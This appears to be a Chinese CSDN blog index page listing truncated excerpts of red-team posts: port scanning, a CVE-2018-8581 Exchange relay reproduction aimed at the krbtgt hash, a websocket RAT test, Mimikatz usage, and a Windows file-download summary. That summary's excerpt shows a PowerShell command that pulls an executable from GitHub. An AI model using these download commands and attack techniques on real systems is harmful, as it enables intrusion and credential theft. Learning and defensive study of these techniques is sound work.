自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

预览 取消 提交

自定义博客皮肤

-+
上一步保存

weixin_42255372的博客

  • 博客(9)
  • 收藏
  • 关注
排序:
按最后发布时间
按访问量
RSS订阅

原创 说明

本博客的文章都是自己的一些日常学习记录,一般情况下,我的文章都会先发布在简书上https://www.jianshu.com/u/d39e64c9b4c4之前是一个WEB安全狗,现目前由于工作的原因,会逐渐以红队工作为主。...

2019-12-19 18:17:50 238

原创 利用Python对网站是否使用CDN进行“粗暴”的判断

什么是CDN?CDN全称Content Delivery Network即内容分发网络。其简单说来就是为服务器建立一个缓存机制,它分布在各地不同的服务器中,当我们去访问使用了CDN的服务器域名的时候,它会根据我们的IP地址,选择离我们最近的CDN服务器,为我们提供更为快速的访问体验。同时他也能隐藏服务器的真实IP,提升攻击门槛。如何判断CDN?网上其实也有很多关于如何判断对方网站是否使用...

2019-12-19 17:31:25 2186

原创 信息收集之端口扫描篇

import osimport reimport nmapimport getoptimport sysimport datetimefrom threading import Thread, Semaphoresm = Semaphore(20)target_t = Falsefile_t = Falsetarget = ""file_name = ""info_lis...

2019-12-19 17:30:22 410

原创 CVE-2018-8581复现

漏洞描述:Exchange Server于2018年11月份被爆出存在SSRF漏洞,可以伪造任意用户。但在之后又被爆出另外一种攻击方式,可以使用任意域内用户通过NTML Relay获取到krbtgt的hash。该hash可用于制作黄金票据,最后可以达到全域通畅的效果。影响范围:Exchange 2010、Exchange 2013、Exchange 2016漏洞复现:环境:DC Wi...

2019-12-19 17:28:59 1123

原创 基于Websocket的RAT

###背景:今天在逛github的时候,无意发现了一款基于websocket传输的RAT。于是就下载下来进行了一番测试。感觉思路清奇,就做个记录吧。地址:https://github.com/Arno0x/WSC2###开始测试:1.首先在VPS上进行下载git clone https://github.com/Arno0x/WSC22.然后安装python库这里需要注意一下,我的系...

2019-12-19 17:26:25 342

原创 Window下的文件下载汇总-未完待续

####1.使用 powershell 的 Syetem.Net.WebClient 进行下载powershell (new-object System.Net.WebClient).DownloadFile('https://github.com/HoldOnToYourHeart/nc/raw/master/calc.exe','C:\Users\31030\Desktop\tools\te...

2019-12-19 17:25:27 570

原创 python socket实现一个简单的客户端与服务端通讯demo

服务端import socketimport threadingbind_ip = '127.0.0.1'bind_port = 8888# 绑定本地端口server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)server.bind((bind_ip, bind_port))# 设置最大连接数server.listen...

2019-12-19 17:24:25 454

原创 Mimikatz的攻击及防御

Mimikatz的攻击及防御Mimikatz的简介:    Mimikatz为法国人Benjamin Delpy编写的一款轻量级的调试工具,在内网渗透过程中,它多数时候是作为一款抓取用户口令的工具。然而Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌。Mimikatz功能介绍:CRYPTO::Certificates – 列出...

2019-12-19 17:23:15 967

原创 python 实现IP开放端口探测与是否部署WEB服务探测

由于工作中需要对多个IP段进行统计,并判断是否部署WEB服务,所以有了写这个脚本的想法。在中间测试脚本的时候,遇到了个坑,我在自己的电脑上运行脚本的时候,没有任何问题。但是当我放到我的服务器上去运行的时候,python在请求了几个站点之后就开始报错了。ConnectionResetError: [Errno 104] Connection reset by peer经过度娘,谷歌的一阵搜索,...

2019-12-19 17:20:40 612

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除